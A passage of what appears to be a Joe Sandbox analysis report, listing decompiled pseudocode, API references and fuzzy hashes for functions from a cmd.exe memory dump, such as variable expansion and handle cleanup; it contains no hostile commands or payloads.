                                    0x011f271d
                                    0x011f26bb
                                    0x011f2738
                                    0x011e6cef
                                    0x011e6cef
                                    0x011e6cef

                                    APIs
                                    • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?,?), ref: 011F26CD
                                    • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?), ref: 011F26ED
                                    • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?), ref: 011F26FD
                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?), ref: 011F2709
                                    • RtlFreeHeap.NTDLL(00000000), ref: 011F2710
                                    • ReleaseMutex.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?), ref: 011F2720
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp Download File
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: CloseHandle$Heap$FreeMutexProcessRelease
                                    • String ID:
                                    • API String ID: 1689195821-0
                                    • Opcode ID: 43aff9ed9de6e9e2c5b8d704d9dc066bda54670e15678b7029d74873cc551807
                                    • Instruction ID: 2ffab06c7dab5df2767991c90d1485b4fbf639a71313ecd42036d1c362f98804
                                    • Opcode Fuzzy Hash: 43aff9ed9de6e9e2c5b8d704d9dc066bda54670e15678b7029d74873cc551807
                                    • Instruction Fuzzy Hash: D7219530201502ABDF2DEF6AD868D6EBB69FF60714714822DEB4583544DF30D891CF91
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011E0178, Relevance: 9.1, APIs: 6, Instructions: 62COMMON
                                    Download Yara Rule
                                    APIs
                                    • _get_osfhandle.MSVCRT ref: 011E0183
                                    • GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,011ED6A1), ref: 011E018D
                                    • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6), ref: 011E01B8
                                    • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(01217F20,00000001), ref: 011E01C7
                                    • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 011E01D2
                                    • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(01217F20), ref: 011E01DB
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp Download File
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: LockShared$AcquireConsoleFileHandleModeReleaseType_get_osfhandle
                                    • String ID:
                                    • API String ID: 513048808-0
                                    • Opcode ID: 306aa1c7617f198a2a300640dd63d2c94be328a6d1716819b0d9c16c7d09af67
                                    • Instruction ID: 44af7ff06a87fcd81453e106437cc6fc443c273649ccdf173e83130d95c542f6
                                    • Opcode Fuzzy Hash: 306aa1c7617f198a2a300640dd63d2c94be328a6d1716819b0d9c16c7d09af67
                                    • Instruction Fuzzy Hash: 6811E333D04A51ABEB29C7ACA90CB7B3AFCE759235F150315F82696084CBB4C980C752
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011E269C, Relevance: 9.1, APIs: 6, Instructions: 54COMMON
                                    Download Yara Rule
                                    APIs
                                    • _get_osfhandle.MSVCRT ref: 011E26A7
                                    • GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,011DC5F8,?,?,?), ref: 011E26B6
                                    • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6,?,?,?,?,?,?,?,?,?,?,?,?,?,?,011DC5C6), ref: 011E26D2
                                    • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(01217F20,00000002), ref: 011E26E1
                                    • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 011E26EC
                                    • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(01217F20,?,?,?,?,?,?,?,?,?,?,?,?,?,?,011DC5C6), ref: 011E26F5
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp Download File
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: LockShared$AcquireConsoleFileHandleModeReleaseType_get_osfhandle
                                    • String ID:
                                    • API String ID: 513048808-0
                                    • Opcode ID: 06bf5e13bcd1366657ca3b88040df9bdfdde6bdc6688e52f19cc0ce836b5b684
                                    • Instruction ID: 79ae1ad7e29900b8fcc99a4db4bca68fb94ce915f47b133b4d7319d3cc6efc41
                                    • Opcode Fuzzy Hash: 06bf5e13bcd1366657ca3b88040df9bdfdde6bdc6688e52f19cc0ce836b5b684
                                    • Instruction Fuzzy Hash: 3A01F733C14C246B9E3952FCAC6CDBB36DCE6652347210321FC25D24C5DF758C854691
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011DFE10, Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 219COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 57%
                                    			E011DFE10(void* __ebx, void* __edi, void* __eflags) {
				signed int _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _t35;
				signed int _t38;
				signed int _t49;
				signed int _t54;
				signed int _t59;
				signed int _t60;
				signed int _t73;
				signed int _t75;
				void* _t78;
				signed int _t79;
				short* _t80;
				signed int _t83;
				void* _t89;
				signed int _t91;
				signed int _t93;
				void* _t95;
				void* _t99;
				signed int _t102;
				signed int _t104;
				signed int _t108;
				signed int _t110;
				signed int _t112;
				void* _t113;
				void* _t116;
				void* _t120;
				void* _t121;

				_t121 = _t120 - 0x14;
				_push(_t113);
				_t79 = 0x4002;
				_t35 = E011E00B0(0x4002);
				_v8 = _t35;
				_t104 = _t35;
				if(_t35 == 0) {
					memset(0x1203890, 0, 0x4006);
					_t121 = _t121 + 0xc;
					 *0x120b8a4 = 0x1203892;
					__imp__longjmp(0x120b8f8, 0xffffffff);
					goto L37;
				} else {
					_t113 =  *0x120b8a4;
					_t102 = 0x2001;
					_t79 = _t35;
					_t78 = _t113 - _t35;
					while(1) {
						_t2 = _t102 + 0x7fffdffd; // 0x7ffffffe
						if(_t2 == 0) {
							break;
						}
						_t73 =  *(_t78 + _t79) & 0x0000ffff;
						if(_t73 == 0) {
							break;
						} else {
							 *_t79 = _t73;
							_t79 = _t79 + 2;
							_t102 = _t102 - 1;
							if(_t102 != 0) {
								continue;
							} else {
								L37:
								_t80 = _t79 - 2;
							}
						}
						goto L7;
					}
					__eflags = _t102;
					if(_t102 == 0) {
						goto L37;
					}
				}
				L7:
				_t75 = 0;
				 *_t80 = 0;
				_t81 = _t104;
				_v12 = 0;
				_t38 =  *_t104 & 0x0000ffff;
				if(_t38 == 0) {
					L13:
					 *0x120b8a4 = 0x1203892;
					 *_t113 = 0;
					if(_t75 > 0x2001) {
						__eflags = 0;
						 *0x1203892 = 0;
						goto L40;
					} else {
						return E011E0040(_t81);
					}
				} else {
					while(1) {
						_t83 = _t104;
						_t104 = _t104 + 2;
						_v16 = _t83;
						if(_t75 > 0x2001) {
							break;
						}
						if(_t38 == 0x25) {
							_t93 =  *0x1213cc4;
							__eflags = _t93;
							if(__eflags == 0) {
								L19:
								_t81 = E011D8F70(0x120b8f8, _t104, __eflags,  &_v12, 0x25);
								__eflags = _t81;
								if(_t81 == 0) {
									__eflags =  *0x1213cc4;
									_t113 =  *0x120b8a4;
									if( *0x1213cc4 == 0) {
										goto L33;
									} else {
										_t104 = _v16 + (_v12 + 1) * 2;
									}
									goto L11;
								} else {
									goto L20;
								}
							} else {
								_t54 =  *_t104 & 0x0000ffff;
								__eflags = _t54 - 0x25;
								if(_t54 == 0x25) {
									_t29 = _t83 + 4; // 0x4
									_t104 = _t29;
									L33:
									 *_t113 = 0x25;
									_t113 = _t113 + 2;
									_t75 = _t75 + 1;
									goto L24;
								} else {
									__eflags = _t54 - 0x2a;
									if(_t54 == 0x2a) {
										__eflags =  *0x1213cc9;
										if( *0x1213cc9 == 0) {
											goto L18;
										} else {
											_t99 =  *(_t93 + 0x34);
											_t18 = _t83 + 4; // 0x4
											_t104 = _t18;
											__eflags = _t99;
											if(_t99 == 0) {
												goto L11;
											} else {
												_t89 = _t99;
												_v16 = _t89 + 2;
												do {
													_t59 =  *_t89;
													_t89 = _t89 + 2;
													__eflags = _t59;
												} while (_t59 != 0);
												_t91 = _t89 - _v16 >> 1;
												_v20 = _t91;
												__eflags = _t91;
												if(_t91 <= 0) {
													goto L11;
												} else {
													_t60 = _t91 + _t75;
													_v16 = _t60;
													__eflags = _t60 - 0x2000;
													if(_t60 > 0x2000) {
														memcpy(_t113, _t99, 0x2000 - _t75 + 0x2000 - _t75);
														 *0x1207892 = 0;
														E011DC5A2(_t91, 0x234f, 1, 0x1203892);
														goto L41;
													} else {
														E011E1040(_t113, 0x2003 - (_t113 - 0x1203890 >> 1), _t99);
														_t75 = _v16;
														_t113 = _t113 + _v20 * 2;
														 *0x120b8a4 = _t113;
														goto L11;
													}
												}
											}
										}
									} else {
										L18:
										_t81 = E011E1969(0x120b8f8, _t104,  &_v12, L"0123456789", _t93 + 0x3c);
										__eflags = _t81;
										if(__eflags != 0) {
											L20:
											_t108 = _t81;
											_t10 = _t108 + 2; // 0x2
											_t95 = _t10;
											do {
												_t49 =  *_t108;
												_t108 = _t108 + 2;
												__eflags = _t49;
											} while (_t49 != 0);
											_t110 = _t108 - _t95 >> 1;
											_t75 = _t75 + _t110;
											__eflags = _t75 - 0x2001;
											if(_t75 > 0x2001) {
												L40:
												_push(0);
												_push(0x233f);
												E011DC5A2(_t81);
												L41:
												_t82 = _v8;
												E011E0040(_v8);
												__imp__longjmp(0x120b8f8, 0xffffffff);
												asm("int3");
												_push(0);
												_push(8);
												E011DC5A2(_t82);
												__eflags = 0;
												return 0;
											} else {
												_t116 =  *0x120b8a4;
												E011E1040(_t116, 0x2003 - (_t116 - 0x1203890 >> 1), _t81);
												_t113 = _t116 + _t110 * 2;
												_t112 = _v12 + 1;
												__eflags = _t112;
												_t104 = _v16 + _t112 * 2;
												L24:
												 *0x120b8a4 = _t113;
												goto L11;
											}
										} else {
											goto L19;
										}
									}
								}
							}
						} else {
							 *_t113 = _t38;
							_t75 = _t75 + 1;
							_t113 = _t113 + 2;
							 *0x120b8a4 = _t113;
							if(_t38 == 0xa) {
								break;
							} else {
								L11:
								_t38 =  *_t104 & 0x0000ffff;
								if(_t38 != 0) {
									continue;
								} else {
									break;
								}
							}
						}
						goto L43;
					}
					_t81 = _v8;
					goto L13;
				}
				L43:
			}

































                                    0x011dfe15
                                    0x011dfe19
                                    0x011dfe1b
                                    0x011dfe20
                                    0x011dfe25
                                    0x011dfe28
                                    0x011dfe2c
                                    0x011ec954
                                    0x011ec959
                                    0x011ec95c
                                    0x011ec96d
                                    0x00000000
                                    0x011dfe32
                                    0x011dfe32
                                    0x011dfe38
                                    0x011dfe3f
                                    0x011dfe41
                                    0x011dfe43
                                    0x011dfe43
                                    0x011dfe4b
                                    0x00000000
                                    0x00000000
                                    0x011dfe4d
                                    0x011dfe54
                                    0x00000000
                                    0x011dfe56
                                    0x011dfe56
                                    0x011dfe59
                                    0x011dfe5c
                                    0x011dfe5f
                                    0x00000000
                                    0x011dfe61
                                    0x011ec973
                                    0x011ec973
                                    0x011ec973
                                    0x011dfe5f
                                    0x00000000
                                    0x011dfe54
                                    0x011dfe66
                                    0x011dfe68
                                    0x00000000
                                    0x00000000
                                    0x011dfe68
                                    0x011dfe6e
                                    0x011dfe70
                                    0x011dfe72
                                    0x011dfe75
                                    0x011dfe77
                                    0x011dfe7a
                                    0x011dfe80
                                    0x011dfeb6
                                    0x011dfeb8
                                    0x011dfec2
                                    0x011dfecb
                                    0x011ec9ad
                                    0x011ec9af
                                    0x00000000
                                    0x011dfed1
                                    0x011dfedc
                                    0x011dfedc
                                    0x011dfe82
                                    0x011dfe82
                                    0x011dfe82
                                    0x011dfe84
                                    0x011dfe87
                                    0x011dfe90
                                    0x00000000
                                    0x00000000
                                    0x011dfe96
                                    0x011dfedd
                                    0x011dfee3
                                    0x011dfee5
                                    0x011dff1b
                                    0x011dff2d
                                    0x011dff2f
                                    0x011dff31
                                    0x011e0022
                                    0x011e0029
                                    0x011e002f
                                    0x00000000
                                    0x011e0031
                                    0x011e0038
                                    0x011e0038
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011dfee7
                                    0x011dfee7
                                    0x011dfeea
                                    0x011dfeed
                                    0x011e000e
                                    0x011e000e
                                    0x011e0011
                                    0x011e0016
                                    0x011e0019
                                    0x011e001c
                                    0x00000000
                                    0x011dfef3
                                    0x011dfef3
                                    0x011dfef6
                                    0x011dff93
                                    0x011dff9a
                                    0x00000000
                                    0x011dffa0
                                    0x011dffa0
                                    0x011dffa3
                                    0x011dffa3
                                    0x011dffa6
                                    0x011dffa8
                                    0x00000000
                                    0x011dffae
                                    0x011dffae
                                    0x011dffb3
                                    0x011dffb6
                                    0x011dffb6
                                    0x011dffb9
                                    0x011dffbc
                                    0x011dffbc
                                    0x011dffc4
                                    0x011dffc6
                                    0x011dffc9
                                    0x011dffcb
                                    0x00000000
                                    0x011dffd1
                                    0x011dffd1
                                    0x011dffd4
                                    0x011dffd7
                                    0x011dffdc
                                    0x011ec987
                                    0x011ec991
                                    0x011ec9a3
                                    0x00000000
                                    0x011dffe2
                                    0x011dfff5
                                    0x011dfffd
                                    0x011e0000
                                    0x011e0003
                                    0x00000000
                                    0x011e0003
                                    0x011dffdc
                                    0x011dffcb
                                    0x011dffa8
                                    0x011dfefc
                                    0x011dfefc
                                    0x011dff15
                                    0x011dff17
                                    0x011dff19
                                    0x011dff37
                                    0x011dff37
                                    0x011dff39
                                    0x011dff39
                                    0x011dff40
                                    0x011dff40
                                    0x011dff43
                                    0x011dff46
                                    0x011dff46
                                    0x011dff4d
                                    0x011dff4f
                                    0x011dff51
                                    0x011dff57
                                    0x011ec9b5
                                    0x011ec9b5
                                    0x011ec9b7
                                    0x011ec9bc
                                    0x011ec9c4
                                    0x011ec9c4
                                    0x011ec9c7
                                    0x011ec9d3
                                    0x011ec9d9
                                    0x011ec9da
                                    0x011ec9dc
                                    0x011ec9de
                                    0x011ec9e6
                                    0x011ec9e9
                                    0x011dff5d
                                    0x011dff5d
                                    0x011dff76
                                    0x011dff7e
                                    0x011dff84
                                    0x011dff84
                                    0x011dff85
                                    0x011dff88
                                    0x011dff88
                                    0x00000000
                                    0x011dff88
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011dff19
                                    0x011dfef6
                                    0x011dfeed
                                    0x011dfe98
                                    0x011dfe98
                                    0x011dfe9b
                                    0x011dfe9c
                                    0x011dfe9f
                                    0x011dfea9
                                    0x00000000
                                    0x011dfeab
                                    0x011dfeab
                                    0x011dfeab
                                    0x011dfeb1
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011dfeb1
                                    0x011dfea9
                                    0x00000000
                                    0x011dfe96
                                    0x011dfeb3
                                    0x00000000
                                    0x011dfeb3
                                    0x00000000

                                    APIs
                                      • Part of subcall function 011E00B0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,011DDF68,00000001,?,00000000,011E3458,-00000105,011FBDD8,00000240,011E4B82,00000000,00000000,011EAE6E,00000000), ref: 011E00C1
                                      • Part of subcall function 011E00B0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,011DDF68,00000001,?,00000000,011E3458,-00000105,011FBDD8,00000240,011E4B82,00000000,00000000,011EAE6E,00000000,?), ref: 011E00C8
                                    • memset.MSVCRT ref: 011EC954
                                    • longjmp.MSVCRT(0120B8F8,000000FF,00000000,01203892,01203890,?,?,?,?,011DFD5C,?,?,?,011E837D,00000000), ref: 011EC96D
                                    • memcpy.MSVCRT ref: 011EC987
                                    • longjmp.MSVCRT(0120B8F8,000000FF,01203892,01203890,?,?,?,?,011DFD5C,?,?,?,011E837D,00000000), ref: 011EC9D3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp Download File
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: Heaplongjmp$AllocProcessmemcpymemset
                                    • String ID: 0123456789
                                    • API String ID: 2034586978-2793719750
                                    • Opcode ID: ab58ff94ca7811257a50575d93aba93322aad1c91b3e3ba362e65e5a85b342b9
                                    • Instruction ID: 892ae28ae374b134047c022107edaa056674a4bc3f41c6ec0e2555b9fa4dbe0b
                                    • Opcode Fuzzy Hash: ab58ff94ca7811257a50575d93aba93322aad1c91b3e3ba362e65e5a85b342b9
                                    • Instruction Fuzzy Hash: 69712635B002179FEB2DDA6CD84C76A7BE1EF84704F194169D906AB386EB709B43C781
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011E6390, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 183COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 77%
                                    			E011E6390(void* __ecx, long __edx) {
				intOrPtr _v8;
				signed int _v16;
				long _v28;
				char _v32;
				void* _v36;
				void _v556;
				signed int _v560;
				signed short* _v564;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t35;
				intOrPtr _t47;
				void* _t54;
				void* _t61;
				signed int _t64;
				signed int _t68;
				signed int _t69;
				signed int _t71;
				signed int _t78;
				signed int _t83;
				signed short* _t92;
				void* _t97;
				signed int _t100;
				intOrPtr _t102;
				void* _t103;
				signed int _t104;
				signed short* _t106;
				int _t108;
				void* _t109;
				signed int _t110;
				signed int _t115;

				_t95 = __edx;
				_t71 = _t115;
				_push(__ecx);
				_push(__ecx);
				_v8 =  *((intOrPtr*)(_t71 + 4));
				_t113 = (_t115 & 0xfffffff8) + 4;
				_t35 =  *0x11fd0b4; // 0x2833377e
				_v16 = _t35 ^ (_t115 & 0xfffffff8) + 0x00000004;
				_t102 =  *((intOrPtr*)(_t71 + 8));
				_t108 = 0;
				_v28 = 0x104;
				_v36 = 0;
				_v32 = 1;
				memset( &_v556, 0, 0x104);
				if(E011E0C70( &_v556, ((0 | _v32 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0) {
					_t47 = 1;
					L32:
					_t108 = _t47;
					L10:
					__imp__??_V@YAXPAX@Z(_v36);
					_pop(_t103);
					_pop(_t109);
					return E011E6FD0(_t108, _t71, _v16 ^ _t113, _t95, _t103, _t109);
				}
				_t104 = E011DEA40( *((intOrPtr*)(_t102 + 0x3c)), 0x11d24ac, (0 |  *0x1213cc9 != 0x00000000) + 2);
				_v560 = _t104;
				if( *0x1213cc9 == 0) {
					L4:
					_t78 = _t104;
					_t17 = _t78 + 2; // 0x2
					_t97 = _t17;
					do {
						_t54 =  *_t78;
						_t78 = _t78 + 2;
					} while (_t54 != _t108);
					_v560 = _t78 - _t97 >> 1;
					E011E1040(_t104, _v560 + 1, E011E22C0(_t71, _t104));
					_t95 =  *_t104 & 0x0000ffff;
					if(_t95 != 0) {
						_t83 = _t104;
						_t26 = _t83 + 2; // 0x2
						_v560 = _t26;
						do {
							_t58 =  *_t83;
							_t83 = _t83 + 2;
						} while (_t58 != _t108);
						if(_t83 - _v560 >> 1 != 2 ||  *((short*)(_t104 + 2)) != 0x3a || iswalpha(_t95) == 0) {
							_t47 = E011F8371(_t58, _t104);
							 *0x120b8b0 = _t47;
							goto L32;
						} else {
							_t88 = _v36;
							if(_v36 == 0) {
								_t88 =  &_v556;
							}
							_t95 = _v28;
							E011E36CB(_t71, _t88, _v28,  *_t104 & 0x0000ffff);
							_t61 = _v36;
							if(_t61 == 0) {
								_t61 =  &_v556;
							}
							L9:
							_push(_t61);
							E011E25D9(L"%s\r\n");
							 *0x120b8b0 = _t108;
							goto L10;
						}
					}
					_t91 =  *0x1213cb8;
					if( *0x1213cb8 == 0) {
						_t91 = 0x1213ab0;
					}
					_t95 =  *0x1213cc0;
					E011E36CB(_t71, _t91,  *0x1213cc0, _t108);
					_t61 =  *0x1213cb8;
					if(_t61 == 0) {
						_t61 = 0x1213ab0;
					}
					goto L9;
				}
				_t64 =  *_t104 & 0x0000ffff;
				_t92 = _t104;
				_t110 = _t104;
				if(_t64 != 0) {
					_t100 = _t64;
					do {
						 *_t110 = _t100;
						if(_t100 == 0) {
							L17:
							_v564 =  &(_t92[1]);
							while(1) {
								_t23 = _t110 - 2; // -4
								_t106 = _t23;
								if(iswspace( *_t106 & 0x0000ffff) == 0) {
									goto L20;
								}
								_t110 = _t106;
							}
							goto L20;
						} else {
							goto L16;
						}
						do {
							L16:
							_t92 =  &(_t92[1]);
							_t110 = _t110 + 2;
							_t69 =  *_t92 & 0x0000ffff;
							 *_t110 = _t69;
						} while (_t69 != 0);
						goto L17;
						L20:
						_t92 = _v564;
						 *_t110 = 0;
						_t110 = _t110 + 2;
						_t68 =  *_t92 & 0x0000ffff;
						_t100 = _t68;
					} while (_t68 != 0);
					_t104 = _v560;
				}
				 *_t110 = 0;
				_t108 = 0;
				goto L4;
			}




































                                    0x011e6390
                                    0x011e6393
                                    0x011e6395
                                    0x011e6396
                                    0x011e63a1
                                    0x011e63a5
                                    0x011e63ad
                                    0x011e63b4
                                    0x011e63b9
                                    0x011e63c2
                                    0x011e63c4
                                    0x011e63cd
                                    0x011e63d2
                                    0x011e63d6
                                    0x011e63ff
                                    0x011ef71c
                                    0x011ef7f0
                                    0x011ef7f0
                                    0x011e64bc
                                    0x011e64bf
                                    0x011e64cb
                                    0x011e64ce
                                    0x011e64da
                                    0x011e64da
                                    0x011e6428
                                    0x011e642a
                                    0x011e6430
                                    0x011e6449
                                    0x011e6449
                                    0x011e644b
                                    0x011e644b
                                    0x011e644e
                                    0x011e644e
                                    0x011e6451
                                    0x011e6454
                                    0x011e645d
                                    0x011e6474
                                    0x011e6479
                                    0x011e647f
                                    0x011ef77f
                                    0x011ef781
                                    0x011ef784
                                    0x011ef78a
                                    0x011ef78a
                                    0x011ef78d
                                    0x011ef790
                                    0x011ef7a0
                                    0x011ef7e6
                                    0x011ef7eb
                                    0x00000000
                                    0x011ef7b5
                                    0x011ef7b5
                                    0x011ef7ba
                                    0x011ef7bc
                                    0x011ef7bc
                                    0x011ef7c5
                                    0x011ef7c9
                                    0x011ef7ce
                                    0x011ef7d3
                                    0x011ef7d9
                                    0x011ef7d9
                                    0x011e64a9
                                    0x011e64a9
                                    0x011e64af
                                    0x011e64b6
                                    0x00000000
                                    0x011e64b6
                                    0x011ef7a0
                                    0x011e6485
                                    0x011e6492
                                    0x011e64dd
                                    0x011e64dd
                                    0x011e6494
                                    0x011e649b
                                    0x011e64a0
                                    0x011e64a7
                                    0x011e64e1
                                    0x011e64e1
                                    0x00000000
                                    0x011e64a7
                                    0x011e6432
                                    0x011e6435
                                    0x011e6437
                                    0x011e643c
                                    0x011ef722
                                    0x011ef724
                                    0x011ef724
                                    0x011ef72a
                                    0x011ef73d
                                    0x011ef740
                                    0x011ef74a
                                    0x011ef74a
                                    0x011ef74a
                                    0x011ef75a
                                    0x00000000
                                    0x00000000
                                    0x011ef748
                                    0x011ef748
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011ef72c
                                    0x011ef72c
                                    0x011ef72c
                                    0x011ef72f
                                    0x011ef732
                                    0x011ef735
                                    0x011ef738
                                    0x00000000
                                    0x011ef75c
                                    0x011ef75c
                                    0x011ef764
                                    0x011ef767
                                    0x011ef76a
                                    0x011ef76d
                                    0x011ef76f
                                    0x011ef774
                                    0x011ef774
                                    0x011e6444
                                    0x011e6447
                                    0x00000000

                                    APIs
                                    • memset.MSVCRT ref: 011E63D6
                                      • Part of subcall function 011E0C70: ??_V@YAXPAX@Z.MSVCRT ref: 011E0CBA
                                      • Part of subcall function 011E0C70: memset.MSVCRT ref: 011E0CDD
                                      • Part of subcall function 011DEA40: wcschr.MSVCRT ref: 011DEAB7
                                      • Part of subcall function 011DEA40: iswspace.MSVCRT ref: 011DEB2D
                                      • Part of subcall function 011DEA40: wcschr.MSVCRT ref: 011DEB49
                                      • Part of subcall function 011DEA40: wcschr.MSVCRT ref: 011DEB6D
                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011E64BF
                                    • iswspace.MSVCRT ref: 011EF751
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp Download File
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: wcschr$iswspacememset
                                    • String ID: %s
                                    • API String ID: 2220997661-3043279178
                                    • Opcode ID: 3111916c693a68d54360fa4a4b35737f4677efdd8e221b84e2c2d39982f27fc9
                                    • Instruction ID: 7390d7a9f5fcb49a626bf0bc735216243d7e8b48e7398698481710cee3615466
                                    • Opcode Fuzzy Hash: 3111916c693a68d54360fa4a4b35737f4677efdd8e221b84e2c2d39982f27fc9
                                    • Instruction Fuzzy Hash: 38512675A009169BDB2CDFA8E8496BBB7F6FF58254F14015DDC05D7240EB308982C791
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011F85E9, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 174COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 78%
                                    			E011F85E9(intOrPtr __ecx, signed int __edx) {
				signed int _v20;
				int _v32;
				char _v36;
				int _v40;
				void _v560;
				int _v568;
				char _v572;
				int _v576;
				void _v1096;
				int _v1104;
				char _v1108;
				int _v1112;
				void* _v1124;
				void _v1632;
				intOrPtr _v1636;
				signed int _v1640;
				int _v1644;
				signed int* _v1648;
				signed int* _v1652;
				signed int _v1656;
				intOrPtr _v1660;
				char _v1664;
				void* _v1668;
				void* _v1672;
				void* _v1676;
				void* _v1680;
				void* _v1684;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t196;
				signed int _t198;
				void* _t218;
				void* _t232;
				signed int _t236;
				void* _t237;
				signed int _t239;
				void* _t240;
				signed int _t241;
				signed int _t242;
				signed int _t244;
				signed int _t252;
				signed int _t253;
				signed int _t255;
				signed char _t258;
				intOrPtr _t260;
				void* _t263;
				signed int _t265;
				signed int _t266;
				signed int _t267;
				signed int _t269;
				signed int _t270;
				signed int _t273;
				signed int _t274;
				signed int _t276;
				signed int _t279;
				void* _t280;
				signed int _t281;
				void* _t282;
				signed int _t290;
				signed int _t291;
				void* _t292;
				signed int _t293;
				signed int _t295;
				void* _t296;
				signed int _t297;
				void* _t298;
				signed int _t299;
				void* _t300;
				void* _t303;
				intOrPtr _t305;
				signed int _t307;
				void* _t316;
				void* _t317;
				signed int _t346;
				void* _t348;
				void* _t352;
				intOrPtr _t354;
				intOrPtr _t356;
				void* _t357;
				WCHAR* _t358;
				signed int _t359;
				signed int _t368;
				intOrPtr _t371;
				signed int _t392;
				signed int _t412;
				void* _t414;
				signed int _t416;
				signed int _t418;
				intOrPtr _t419;
				void* _t420;
				signed int* _t421;
				void* _t422;
				signed int _t426;
				signed int _t428;
				signed int _t431;
				void* _t435;

				_t391 = __edx;
				_t318 = __ecx;
				_t418 = __edx;
				if(__ecx != 0) {
					_push(0);
					_push(__ecx);
					E011DC108(__ecx);
					_pop(_t318);
				}
				if(_t418 == 1) {
					_t418 = 0x1213d00;
					E011E274C(0x1213d00, 0x104, L"%9d",  *0x11fd56c);
					E011DC108(_t318, 0x2336, 1, 0x1213d00);
					_t426 = _t426 + 0x1c;
				}
				 *0x11fd560 =  *0x1218064 & 0x000000ff;
				while(1) {
					_t196 =  *0x11fd5dc; // 0x0
					_t435 =  *0x11fd568 - _t196; // 0x0
					if(_t435 >= 0) {
						break;
					}
					_t318 =  *((intOrPtr*)( *0x1213cf4 + _t196 * 4 - 4));
					E011DCD27(_t318);
				}
				__imp__longjmp(0x120b8f8, 1);
				asm("int3");
				_t428 = (_t426 & 0xfffffff8) - 0x67c;
				_t198 =  *0x11fd0b4; // 0x2833377e
				_v20 = _t198 ^ _t428;
				_push(_t418);
				_push(_t412);
				_v1640 = _t391;
				_t419 = _t318;
				_v1104 = 0x104;
				_v1644 = 0;
				_t316 = 1;
				_v1112 = 0;
				_t413 = _t412 | 0xffffffff;
				_v1108 = 1;
				memset( &_v1632, 0, 0x104);
				_v36 = 1;
				_v32 = 0x104;
				_v40 = 0;
				memset( &_v560, 0, 0x104);
				_v572 = 1;
				_v568 = 0x104;
				_v576 = 0;
